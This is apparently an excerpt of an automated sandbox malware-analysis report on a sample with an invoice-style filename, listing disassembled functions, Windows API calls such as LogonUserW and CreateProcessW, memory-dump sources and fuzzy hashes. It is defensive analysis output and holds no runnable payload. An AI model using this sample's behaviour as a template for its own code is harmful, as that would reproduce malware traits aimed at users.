                                                                            • Opcode Fuzzy Hash: 973b818caf853693d0abb8b596f240d48de94d18c6ac64689341cded386dfcc0
                                                                            • Instruction Fuzzy Hash: 43321721D29F494DD723A634D832335A248AFF73D8F15D737F829B5AAAEB68C4835100
                                                                            Function 00F0242E Relevance: 1.8, APIs: 1, Instructions: 294COMMON
                                                                            Download Yara Rule
                                                                            Memory Dump Source
                                                                            • Source File: 00000000.00000002.1298945126.0000000000ED1000.00000040.00000001.01000000.00000003.sdmp, Offset: 00ED0000, based on PE: true
                                                                            • Associated: 00000000.00000002.1298913709.0000000000ED0000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                            • Associated: 00000000.00000002.1298945126.0000000000F84000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                                            • Associated: 00000000.00000002.1298945126.0000000000F8E000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                                            • Associated: 00000000.00000002.1298945126.0000000000F9D000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                                            • Associated: 00000000.00000002.1298945126.0000000001021000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                                            • Associated: 00000000.00000002.1299092015.0000000001027000.00000080.00000001.01000000.00000003.sdmpDownload File
                                                                            • Associated: 00000000.00000002.1299108505.0000000001028000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                            Joe Sandbox IDA Plugin
                                                                            • Snapshot File: hcaresult_0_2_ed0000_z49FACTURA-0987678.jbxd
                                                                            Similarity
                                                                            • API ID:
                                                                            • String ID:
                                                                            • API String ID:
                                                                            • Opcode ID: 327ecc85c2e7882bea7a083c8916d354587f037da265b539810d70441146f086
                                                                            • Instruction ID: b2d063f057b0c07ad353ce43728dacf1b95d2c76df70a9a185174e396a5dff27
                                                                            • Opcode Fuzzy Hash: 327ecc85c2e7882bea7a083c8916d354587f037da265b539810d70441146f086
                                                                            • Instruction Fuzzy Hash: 58B12130D2AF444DD32396398836336B64CAFBB2C5F51D71BFC2670E62EB6285836641
                                                                            Function 00F38889 Relevance: 1.6, APIs: 1, Instructions: 68COMMON
                                                                            Download Yara Rule
                                                                            APIs
                                                                            • __time64.LIBCMT ref: 00F3889B
                                                                              • Part of subcall function 00EF520A: GetSystemTimeAsFileTime.KERNEL32(00000000,?,?,?,00F38F6E,00000000,?,?,?,?,00F3911F,00000000,?), ref: 00EF5213
                                                                              • Part of subcall function 00EF520A: __aulldiv.LIBCMT ref: 00EF5233
                                                                            Memory Dump Source
                                                                            • Source File: 00000000.00000002.1298945126.0000000000ED1000.00000040.00000001.01000000.00000003.sdmp, Offset: 00ED0000, based on PE: true
                                                                            • Associated: 00000000.00000002.1298913709.0000000000ED0000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                            • Associated: 00000000.00000002.1298945126.0000000000F84000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                                            • Associated: 00000000.00000002.1298945126.0000000000F8E000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                                            • Associated: 00000000.00000002.1298945126.0000000000F9D000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                                            • Associated: 00000000.00000002.1298945126.0000000001021000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                                            • Associated: 00000000.00000002.1299092015.0000000001027000.00000080.00000001.01000000.00000003.sdmpDownload File
                                                                            • Associated: 00000000.00000002.1299108505.0000000001028000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                            Joe Sandbox IDA Plugin
                                                                            • Snapshot File: hcaresult_0_2_ed0000_z49FACTURA-0987678.jbxd
                                                                            Similarity
                                                                            • API ID: Time$FileSystem__aulldiv__time64
                                                                            • String ID:
                                                                            • API String ID: 2893107130-0
                                                                            • Opcode ID: 49b2e9c5917fd49cb74793c75d9c84f993cf17591cec9884df7d94996addab3a
                                                                            • Instruction ID: 2b8db80169412e2c97880db0942db08bac38b9757f6c13ef73d2efe7123103db
                                                                            • Opcode Fuzzy Hash: 49b2e9c5917fd49cb74793c75d9c84f993cf17591cec9884df7d94996addab3a
                                                                            • Instruction Fuzzy Hash: 9021B432A35610CBC729CF25D841A52B3E1EFA5321F698E6DE1F5CB2D0CA34B905DB54
                                                                            Function 00F5D78C Relevance: 1.6, APIs: 1, Instructions: 66nativeCOMMON
                                                                            Download Yara Rule
                                                                            APIs
                                                                              • Part of subcall function 00ED2612: GetWindowLongW.USER32(?,000000EB), ref: 00ED2623
                                                                            • NtdllDialogWndProc_W.NTDLL(?,00000112,?,00000000), ref: 00F5D838
                                                                            Memory Dump Source
                                                                            • Source File: 00000000.00000002.1298945126.0000000000ED1000.00000040.00000001.01000000.00000003.sdmp, Offset: 00ED0000, based on PE: true
                                                                            • Associated: 00000000.00000002.1298913709.0000000000ED0000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                            • Associated: 00000000.00000002.1298945126.0000000000F84000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                                            • Associated: 00000000.00000002.1298945126.0000000000F8E000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                                            • Associated: 00000000.00000002.1298945126.0000000000F9D000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                                            • Associated: 00000000.00000002.1298945126.0000000001021000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                                            • Associated: 00000000.00000002.1299092015.0000000001027000.00000080.00000001.01000000.00000003.sdmpDownload File
                                                                            • Associated: 00000000.00000002.1299108505.0000000001028000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                            Joe Sandbox IDA Plugin
                                                                            • Snapshot File: hcaresult_0_2_ed0000_z49FACTURA-0987678.jbxd
                                                                            Similarity
                                                                            • API ID: DialogLongNtdllProc_Window
                                                                            • String ID:
                                                                            • API String ID: 2065330234-0
                                                                            • Opcode ID: 181687a8148050b496596d2506915104216aacdeb82e6c4a25085d10ddc4a069
                                                                            • Instruction ID: 8b3d8d3c6f0e1f06aeb6abab1c0678efaf0ee6b260fad8e6e65052f2b2498238
                                                                            • Opcode Fuzzy Hash: 181687a8148050b496596d2506915104216aacdeb82e6c4a25085d10ddc4a069
                                                                            • Instruction Fuzzy Hash: D3112735205215ABEB355A2CCC06F7A3704D745B22F244315FF219B6E2CA649D09B3A5
                                                                            Function 00F5D3B8 Relevance: 1.5, APIs: 1, Instructions: 47nativeCOMMON
                                                                            Download Yara Rule
                                                                            APIs
                                                                              • Part of subcall function 00ED25DB: GetWindowLongW.USER32(?,000000EB), ref: 00ED25EC
                                                                            • NtdllDialogWndProc_W.NTDLL(?,00000115,?,?,?,?,?,?,00F0B952,?,?,?,?,00000000,?), ref: 00F5D432
                                                                            Memory Dump Source
                                                                            • Source File: 00000000.00000002.1298945126.0000000000ED1000.00000040.00000001.01000000.00000003.sdmp, Offset: 00ED0000, based on PE: true
                                                                            • Associated: 00000000.00000002.1298913709.0000000000ED0000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                            • Associated: 00000000.00000002.1298945126.0000000000F84000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                                            • Associated: 00000000.00000002.1298945126.0000000000F8E000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                                            • Associated: 00000000.00000002.1298945126.0000000000F9D000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                                            • Associated: 00000000.00000002.1298945126.0000000001021000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                                            • Associated: 00000000.00000002.1299092015.0000000001027000.00000080.00000001.01000000.00000003.sdmpDownload File
                                                                            • Associated: 00000000.00000002.1299108505.0000000001028000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                            Joe Sandbox IDA Plugin
                                                                            • Snapshot File: hcaresult_0_2_ed0000_z49FACTURA-0987678.jbxd
                                                                            Similarity
                                                                            • API ID: DialogLongNtdllProc_Window
                                                                            • String ID:
                                                                            • API String ID: 2065330234-0
                                                                            • Opcode ID: 7da8356fde353a66b0cbcfe44a779c111faa3dee9b72f52ce7be94c5b889aac6
                                                                            • Instruction ID: bccc9719ddfb54b78f494df6b651200b9688fe3dfea85f6b02d3dcc3dda91fee
                                                                            • Opcode Fuzzy Hash: 7da8356fde353a66b0cbcfe44a779c111faa3dee9b72f52ce7be94c5b889aac6
                                                                            • Instruction Fuzzy Hash: 3001F531A01118ABDF24CF25C845AB93B91EF46333F444125FF061B291C331BC56B7A0
                                                                            Function 00F5BC5D Relevance: 1.5, APIs: 1, Instructions: 37COMMON
                                                                            Download Yara Rule
                                                                            APIs
                                                                              • Part of subcall function 00ED25DB: GetWindowLongW.USER32(?,000000EB), ref: 00ED25EC
                                                                            • CallWindowProcW.USER32(?,?,00000020,?,?), ref: 00F5BCA3
                                                                            Memory Dump Source
                                                                            • Source File: 00000000.00000002.1298945126.0000000000ED1000.00000040.00000001.01000000.00000003.sdmp, Offset: 00ED0000, based on PE: true
                                                                            • Associated: 00000000.00000002.1298913709.0000000000ED0000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                            • Associated: 00000000.00000002.1298945126.0000000000F84000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                                            • Associated: 00000000.00000002.1298945126.0000000000F8E000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                                            • Associated: 00000000.00000002.1298945126.0000000000F9D000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                                            • Associated: 00000000.00000002.1298945126.0000000001021000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                                            • Associated: 00000000.00000002.1299092015.0000000001027000.00000080.00000001.01000000.00000003.sdmpDownload File
                                                                            • Associated: 00000000.00000002.1299108505.0000000001028000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                            Joe Sandbox IDA Plugin
                                                                            • Snapshot File: hcaresult_0_2_ed0000_z49FACTURA-0987678.jbxd
                                                                            Similarity
                                                                            • API ID: Window$CallLongProc
                                                                            • String ID:
                                                                            • API String ID: 4084987330-0
                                                                            • Opcode ID: f52784283595eda32559d60f78006bb5e686217dd7ceb53efe1e468319988022
                                                                            • Instruction ID: 7ffed51490e29c2041da7d1c2e2cb0c5b221cf2e2082de9298ae793d92caf398
                                                                            • Opcode Fuzzy Hash: f52784283595eda32559d60f78006bb5e686217dd7ceb53efe1e468319988022
                                                                            • Instruction Fuzzy Hash: 8BF04F3110010CEFCF059F54ED48D793BA6EB08362B044155FE114A271CB329D60FB94
                                                                            Function 00ED189B Relevance: 1.5, APIs: 1, Instructions: 29nativeCOMMON
                                                                            Download Yara Rule
                                                                            APIs
                                                                              • Part of subcall function 00ED2612: GetWindowLongW.USER32(?,000000EB), ref: 00ED2623
                                                                            • NtdllDialogWndProc_W.NTDLL(?,00000006,00000000,?,?,?,00ED1B04,?,?,?,?,?), ref: 00ED18E2
                                                                            Memory Dump Source
                                                                            • Source File: 00000000.00000002.1298945126.0000000000ED1000.00000040.00000001.01000000.00000003.sdmp, Offset: 00ED0000, based on PE: true
                                                                            • Associated: 00000000.00000002.1298913709.0000000000ED0000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                            • Associated: 00000000.00000002.1298945126.0000000000F84000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                                            • Associated: 00000000.00000002.1298945126.0000000000F8E000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                                            • Associated: 00000000.00000002.1298945126.0000000000F9D000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                                            • Associated: 00000000.00000002.1298945126.0000000001021000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                                            • Associated: 00000000.00000002.1299092015.0000000001027000.00000080.00000001.01000000.00000003.sdmpDownload File
                                                                            • Associated: 00000000.00000002.1299108505.0000000001028000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                            Joe Sandbox IDA Plugin
                                                                            • Snapshot File: hcaresult_0_2_ed0000_z49FACTURA-0987678.jbxd
                                                                            Similarity
                                                                            • API ID: DialogLongNtdllProc_Window
                                                                            • String ID:
                                                                            • API String ID: 2065330234-0
                                                                            • Opcode ID: 25aa69028b5461da1586db66a67993f4d1895cfc93666cab34f117ae3031eed7
                                                                            • Instruction ID: 336da070eb7de95d33891e7d7acb87728fe8d15fc2a925c0f7128757c584db01
                                                                            • Opcode Fuzzy Hash: 25aa69028b5461da1586db66a67993f4d1895cfc93666cab34f117ae3031eed7
                                                                            • Instruction Fuzzy Hash: 2BF0BE3420021CEFDF19DF44D85096A37E2EB00310F50412AF9524B3A1C732D960FB50
                                                                            Function 00F5C8BE Relevance: 1.5, APIs: 1, Instructions: 24nativeCOMMON
                                                                            Download Yara Rule
                                                                            APIs
                                                                            • NtdllDialogWndProc_W.NTDLL(?,00000232,?,?), ref: 00F5C8FE
                                                                            Memory Dump Source
                                                                            • Source File: 00000000.00000002.1298945126.0000000000ED1000.00000040.00000001.01000000.00000003.sdmp, Offset: 00ED0000, based on PE: true
                                                                            • Associated: 00000000.00000002.1298913709.0000000000ED0000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                            • Associated: 00000000.00000002.1298945126.0000000000F84000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                                            • Associated: 00000000.00000002.1298945126.0000000000F8E000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                                            • Associated: 00000000.00000002.1298945126.0000000000F9D000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                                            • Associated: 00000000.00000002.1298945126.0000000001021000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                                            • Associated: 00000000.00000002.1299092015.0000000001027000.00000080.00000001.01000000.00000003.sdmpDownload File
                                                                            • Associated: 00000000.00000002.1299108505.0000000001028000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                            Joe Sandbox IDA Plugin
                                                                            • Snapshot File: hcaresult_0_2_ed0000_z49FACTURA-0987678.jbxd
                                                                            Similarity
                                                                            • API ID: DialogNtdllProc_
                                                                            • String ID:
                                                                            • API String ID: 3239928679-0
                                                                            • Opcode ID: f6b50bcc337b50ba83ce85146e2cfc86d036c8e1006e00895939df63eba62449
                                                                            • Instruction ID: f6b775f0700774b53d047483fe03940dce86a172be35d42d816e8c09cabbb7f9
                                                                            • Opcode Fuzzy Hash: f6b50bcc337b50ba83ce85146e2cfc86d036c8e1006e00895939df63eba62449
                                                                            • Instruction Fuzzy Hash: 8EF06D31210358AFDF22DF58DC05FD63B95EB09721F544059BA21672E2CB706924E7A0
                                                                            Function 00F287B1 Relevance: 1.5, APIs: 1, Instructions: 19COMMON
                                                                            Download Yara Rule
                                                                            APIs
                                                                            • LogonUserW.ADVAPI32(?,00000001,?,?,00000000,00F28389), ref: 00F287D1
                                                                            Memory Dump Source
                                                                            • Source File: 00000000.00000002.1298945126.0000000000ED1000.00000040.00000001.01000000.00000003.sdmp, Offset: 00ED0000, based on PE: true
                                                                            • Associated: 00000000.00000002.1298913709.0000000000ED0000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                            • Associated: 00000000.00000002.1298945126.0000000000F84000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                                            • Associated: 00000000.00000002.1298945126.0000000000F8E000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                                            • Associated: 00000000.00000002.1298945126.0000000000F9D000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                                            • Associated: 00000000.00000002.1298945126.0000000001021000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                                            • Associated: 00000000.00000002.1299092015.0000000001027000.00000080.00000001.01000000.00000003.sdmpDownload File
                                                                            • Associated: 00000000.00000002.1299108505.0000000001028000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                            Joe Sandbox IDA Plugin
                                                                            • Snapshot File: hcaresult_0_2_ed0000_z49FACTURA-0987678.jbxd
                                                                            Similarity
                                                                            • API ID: LogonUser
                                                                            • String ID:
                                                                            • API String ID: 1244722697-0
                                                                            • Opcode ID: 3454ffed5b3edd72482db6cd30441e7d62085984008ae028e550d629f3d3742a
                                                                            • Instruction ID: 013e373cf8746083044adfe4071c1e41d614ab43da31d205dfa4d477e084761f
                                                                            • Opcode Fuzzy Hash: 3454ffed5b3edd72482db6cd30441e7d62085984008ae028e550d629f3d3742a
                                                                            • Instruction Fuzzy Hash: BDD05E3226060EABEF018EA4DC01EAE3B69EB04B01F408111FE15C50A1C775D835AB60
                                                                            Function 00F5C909 Relevance: 1.5, APIs: 1, Instructions: 18nativeCOMMON
                                                                            Download Yara Rule
                                                                            APIs
                                                                            • NtdllDialogWndProc_W.NTDLL(?,00000053,?,?,?,00F0B9BC,?,?,?,?,?,?), ref: 00F5C934
                                                                              • Part of subcall function 00F5B635: _memset.LIBCMT ref: 00F5B644
                                                                              • Part of subcall function 00F5B635: _memset.LIBCMT ref: 00F5B653
                                                                              • Part of subcall function 00F5B635: CreateProcessW.KERNEL32(00000000,?,00000000,00000000,00000000,00000020,00000000,00000000,00F96F20,00F96F64), ref: 00F5B682
                                                                              • Part of subcall function 00F5B635: CloseHandle.KERNEL32 ref: 00F5B694
                                                                            Memory Dump Source
                                                                            • Source File: 00000000.00000002.1298945126.0000000000ED1000.00000040.00000001.01000000.00000003.sdmp, Offset: 00ED0000, based on PE: true
                                                                            • Associated: 00000000.00000002.1298913709.0000000000ED0000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                            • Associated: 00000000.00000002.1298945126.0000000000F84000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                                            • Associated: 00000000.00000002.1298945126.0000000000F8E000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                                            • Associated: 00000000.00000002.1298945126.0000000000F9D000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                                            • Associated: 00000000.00000002.1298945126.0000000001021000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                                            • Associated: 00000000.00000002.1299092015.0000000001027000.00000080.00000001.01000000.00000003.sdmpDownload File
                                                                            • Associated: 00000000.00000002.1299108505.0000000001028000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                            Joe Sandbox IDA Plugin
                                                                            • Snapshot File: hcaresult_0_2_ed0000_z49FACTURA-0987678.jbxd
                                                                            Similarity
                                                                            • API ID: _memset$CloseCreateDialogHandleNtdllProc_Process
                                                                            • String ID:
                                                                            • API String ID: 2364484715-0
                                                                            • Opcode ID: 4d3be39880c4b2f8a64117d640a1c9e618ec7b46abec760dd17d7a2803acbe5c
                                                                            • Instruction ID: d12ad08088453a0e7a05fd86c0a53929d9adc81ec2c41dba49a241d95026b2df
                                                                            • Opcode Fuzzy Hash: 4d3be39880c4b2f8a64117d640a1c9e618ec7b46abec760dd17d7a2803acbe5c
                                                                            • Instruction Fuzzy Hash: BAE01232110208EFCB02AF44DC10E853BA1FB08712F018051FE06072B2C731A824EF90
                                                                            Function 00ED167D Relevance: 1.5, APIs: 1, Instructions: 18nativeCOMMON
                                                                            Download Yara Rule
                                                                            APIs
                                                                              • Part of subcall function 00ED2612: GetWindowLongW.USER32(?,000000EB), ref: 00ED2623
                                                                            • NtdllDialogWndProc_W.NTDLL(?,00000007,?,00000000,00000000,?,?,?,00ED1AEE,?,?,?), ref: 00ED16AB
                                                                            Memory Dump Source
                                                                            • Source File: 00000000.00000002.1298945126.0000000000ED1000.00000040.00000001.01000000.00000003.sdmp, Offset: 00ED0000, based on PE: true
                                                                            • Associated: 00000000.00000002.1298913709.0000000000ED0000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                            • Associated: 00000000.00000002.1298945126.0000000000F84000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                                            • Associated: 00000000.00000002.1298945126.0000000000F8E000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                                            • Associated: 00000000.00000002.1298945126.0000000000F9D000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                                            • Associated: 00000000.00000002.1298945126.0000000001021000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                                            • Associated: 00000000.00000002.1299092015.0000000001027000.00000080.00000001.01000000.00000003.sdmpDownload File
                                                                            • Associated: 00000000.00000002.1299108505.0000000001028000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                            Joe Sandbox IDA Plugin
                                                                            • Snapshot File: hcaresult_0_2_ed0000_z49FACTURA-0987678.jbxd
                                                                            Similarity
                                                                            • API ID: DialogLongNtdllProc_Window
                                                                            • String ID:
                                                                            • API String ID: 2065330234-0
                                                                            • Opcode ID: 86ff626261883dec076b12474eadab2a0c48d6617114c3ed6f73aced52d3e8e5
                                                                            • Instruction ID: cff2e10c4bacac71db512f384e57f831da27c795ca68783881b2099be3805940
                                                                            • Opcode Fuzzy Hash: 86ff626261883dec076b12474eadab2a0c48d6617114c3ed6f73aced52d3e8e5
                                                                            • Instruction Fuzzy Hash: 9EE0EC35100208FBCF16AF90DC11E643B66FB58710F508459FA551A2A2CA32A522EB50
                                                                            Function 00F5C88F Relevance: 1.5, APIs: 1, Instructions: 14nativeCOMMON
                                                                            Download Yara Rule
                                                                            APIs
                                                                            • NtdllDialogWndProc_W.NTDLL ref: 00F5C8B4
                                                                            Memory Dump Source
                                                                            • Source File: 00000000.00000002.1298945126.0000000000ED1000.00000040.00000001.01000000.00000003.sdmp, Offset: 00ED0000, based on PE: true
                                                                            • Associated: 00000000.00000002.1298913709.0000000000ED0000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                            • Associated: 00000000.00000002.1298945126.0000000000F84000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                                            • Associated: 00000000.00000002.1298945126.0000000000F8E000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                                            • Associated: 00000000.00000002.1298945126.0000000000F9D000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                                            • Associated: 00000000.00000002.1298945126.0000000001021000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                                            • Associated: 00000000.00000002.1299092015.0000000001027000.00000080.00000001.01000000.00000003.sdmpDownload File
                                                                            • Associated: 00000000.00000002.1299108505.0000000001028000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                            Joe Sandbox IDA Plugin
                                                                            • Snapshot File: hcaresult_0_2_ed0000_z49FACTURA-0987678.jbxd
                                                                            Similarity
                                                                            • API ID: DialogNtdllProc_
                                                                            • String ID:
                                                                            • API String ID: 3239928679-0
                                                                            • Opcode ID: 455a74aa3d2f6ab3028ee1b9006f4927ef8c87c557331da702417570e20b4350
                                                                            • Instruction ID: c622562ad272c04ca236e0d0281462004aba9451ffce55c53ea9efefe3759ba9
                                                                            • Opcode Fuzzy Hash: 455a74aa3d2f6ab3028ee1b9006f4927ef8c87c557331da702417570e20b4350
                                                                            • Instruction Fuzzy Hash: F6E0E23521020CEFCB02DF88D844D863BA5AB1D700F014094FA0547262C771A820EBA1
                                                                            Function 00F5C860 Relevance: 1.5, APIs: 1, Instructions: 14nativeCOMMON
                                                                            Download Yara Rule
                                                                            APIs
                                                                            • NtdllDialogWndProc_W.NTDLL ref: 00F5C885
                                                                            Memory Dump Source
                                                                            • Source File: 00000000.00000002.1298945126.0000000000ED1000.00000040.00000001.01000000.00000003.sdmp, Offset: 00ED0000, based on PE: true
                                                                            • Associated: 00000000.00000002.1298913709.0000000000ED0000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                            • Associated: 00000000.00000002.1298945126.0000000000F84000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                                            • Associated: 00000000.00000002.1298945126.0000000000F8E000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                                            • Associated: 00000000.00000002.1298945126.0000000000F9D000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                                            • Associated: 00000000.00000002.1298945126.0000000001021000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                                            • Associated: 00000000.00000002.1299092015.0000000001027000.00000080.00000001.01000000.00000003.sdmpDownload File
                                                                            • Associated: 00000000.00000002.1299108505.0000000001028000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                            Joe Sandbox IDA Plugin
                                                                            • Snapshot File: hcaresult_0_2_ed0000_z49FACTURA-0987678.jbxd
                                                                            Similarity
                                                                            • API ID: DialogNtdllProc_
                                                                            • String ID:
                                                                            • API String ID: 3239928679-0
                                                                            • Opcode ID: 6a7b03a3227960f66593f815d541e441498ac8778cf21d05274fda297a57cc4b
                                                                            • Instruction ID: afb457edae0448100aed68af7d974d43d8832c846d89118bb7787cd2acd4a911
                                                                            • Opcode Fuzzy Hash: 6a7b03a3227960f66593f815d541e441498ac8778cf21d05274fda297a57cc4b
                                                                            • Instruction Fuzzy Hash: DAE0E23521420CEFCB02DF88D884E863BA5AB1D700F014094FA0547262C771A820EB61
                                                                            Function 00ED16B5 Relevance: 1.5, APIs: 1, Instructions: 14nativeCOMMON
                                                                            Download Yara Rule
                                                                            APIs
                                                                              • Part of subcall function 00ED2612: GetWindowLongW.USER32(?,000000EB), ref: 00ED2623
                                                                              • Part of subcall function 00ED201B: DestroyWindow.USER32(?,?,?,?,?,?,?,?,?,?,?,00000000,?,?), ref: 00ED20D3
                                                                              • Part of subcall function 00ED201B: KillTimer.USER32(-00000001,?,?,?,?,00ED16CB,00000000,?,?,00ED1AE2,?,?), ref: 00ED216E
                                                                            • NtdllDialogWndProc_W.NTDLL(?,00000002,00000000,00000000,00000000,?,?,00ED1AE2,?,?), ref: 00ED16D4
                                                                            Memory Dump Source
                                                                            • Source File: 00000000.00000002.1298945126.0000000000ED1000.00000040.00000001.01000000.00000003.sdmp, Offset: 00ED0000, based on PE: true
                                                                            • Associated: 00000000.00000002.1298913709.0000000000ED0000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                            • Associated: 00000000.00000002.1298945126.0000000000F84000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                                            • Associated: 00000000.00000002.1298945126.0000000000F8E000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                                            • Associated: 00000000.00000002.1298945126.0000000000F9D000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                                            • Associated: 00000000.00000002.1298945126.0000000001021000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                                            • Associated: 00000000.00000002.1299092015.0000000001027000.00000080.00000001.01000000.00000003.sdmpDownload File
                                                                            • Associated: 00000000.00000002.1299108505.0000000001028000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                            Joe Sandbox IDA Plugin
                                                                            • Snapshot File: hcaresult_0_2_ed0000_z49FACTURA-0987678.jbxd
                                                                            Similarity
                                                                            • API ID: Window$DestroyDialogKillLongNtdllProc_Timer
                                                                            • String ID:
                                                                            • API String ID: 2797419724-0
                                                                            • Opcode ID: ed27a7106d6a1fe11ce7d65cd3bf7725c5ecb9927b1d87506d45224d7d0a7c1f
                                                                            • Instruction ID: 9c3d05f272a68753564b0e919449477e5a7a73856a7bf65c6fff49f13f7cd600
                                                                            • Opcode Fuzzy Hash: ed27a7106d6a1fe11ce7d65cd3bf7725c5ecb9927b1d87506d45224d7d0a7c1f
                                                                            • Instruction Fuzzy Hash: 64D0123014030CB7DE122F91DC17F493A59DB24B50F508025BB04792D3CA71A911B559
                                                                            Function 00EFA124 Relevance: 1.5, APIs: 1, Instructions: 6COMMON
                                                                            Download Yara Rule
                                                                            APIs
                                                                            • SetUnhandledExceptionFilter.KERNEL32(?), ref: 00EFA12A
                                                                            Memory Dump Source
                                                                            • Source File: 00000000.00000002.1298945126.0000000000ED1000.00000040.00000001.01000000.00000003.sdmp, Offset: 00ED0000, based on PE: true
                                                                            • Associated: 00000000.00000002.1298913709.0000000000ED0000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                            • Associated: 00000000.00000002.1298945126.0000000000F84000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                                            • Associated: 00000000.00000002.1298945126.0000000000F8E000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                                            • Associated: 00000000.00000002.1298945126.0000000000F9D000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                                            • Associated: 00000000.00000002.1298945126.0000000001021000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                                            • Associated: 00000000.00000002.1299092015.0000000001027000.00000080.00000001.01000000.00000003.sdmpDownload File
                                                                            • Associated: 00000000.00000002.1299108505.0000000001028000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                            Joe Sandbox IDA Plugin
                                                                            • Snapshot File: hcaresult_0_2_ed0000_z49FACTURA-0987678.jbxd
                                                                            Similarity
                                                                            • API ID: ExceptionFilterUnhandled
                                                                            • String ID:
                                                                            • API String ID: 3192549508-0
                                                                            • Opcode ID: bf5207311d2b60265796e3f27ac954f50d9a7fd08137d139bfc0c44e3aac9018
                                                                            • Instruction ID: 5d3543bef3d88f02f8532f3fd0c043d72cacc9ea476df9fd2ccdc93b3ea7ad5e
                                                                            • Opcode Fuzzy Hash: bf5207311d2b60265796e3f27ac954f50d9a7fd08137d139bfc0c44e3aac9018
                                                                            • Instruction Fuzzy Hash: F7A0123000020CA78A002F41EC044447F5CD7011917004060F50C40031873254105580
                                                                            Function 00EE8808 Relevance: .6, Instructions: 590COMMON
                                                                            Download Yara Rule
                                                                            Memory Dump Source
                                                                            • Source File: 00000000.00000002.1298945126.0000000000ED1000.00000040.00000001.01000000.00000003.sdmp, Offset: 00ED0000, based on PE: true
                                                                            • Associated: 00000000.00000002.1298913709.0000000000ED0000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                            • Associated: 00000000.00000002.1298945126.0000000000F84000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                                            • Associated: 00000000.00000002.1298945126.0000000000F8E000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                                            • Associated: 00000000.00000002.1298945126.0000000000F9D000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                                            • Associated: 00000000.00000002.1298945126.0000000001021000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                                            • Associated: 00000000.00000002.1299092015.0000000001027000.00000080.00000001.01000000.00000003.sdmpDownload File
